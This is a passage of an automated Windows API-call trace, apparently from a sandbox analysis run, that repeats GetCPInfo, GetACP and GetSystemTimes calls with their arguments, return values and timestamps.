CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.417] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.418] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.418] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.418] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.418] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.418] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.418] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.418] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.418] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.418] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.418] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.418] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.418] GetACP () returned 0x4e4 [0120.418] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.419] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.419] GetACP () returned 0x4e4 [0120.419] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.420] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.420] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.420] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.420] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.420] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.420] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.420] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.420] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.421] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.421] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.421] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.421] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.421] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.421] GetACP () returned 0x4e4 [0120.421] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.421] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.422] GetACP () returned 0x4e4 [0120.422] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.487] GetACP () returned 0x4e4 [0120.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.487] GetACP () returned 0x4e4 [0120.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.488] GetACP () returned 0x4e4 [0120.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.488] GetACP () returned 0x4e4 [0120.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.488] GetACP () returned 0x4e4 [0120.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.488] GetACP () returned 0x4e4 [0120.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.488] GetACP () returned 0x4e4 [0120.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.488] GetACP () returned 0x4e4 [0120.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.489] GetACP () returned 0x4e4 [0120.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.490] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.491] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.491] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.491] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.491] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.491] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.491] GetACP () returned 0x4e4 [0120.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.492] GetACP () returned 0x4e4 [0120.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.493] GetACP () returned 0x4e4 [0120.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.493] GetACP () returned 0x4e4 [0120.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.493] GetACP () returned 0x4e4 [0120.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.493] GetACP () returned 0x4e4 [0120.493] GetSystemTimes (in: lpIdleTime=0x18fa70, 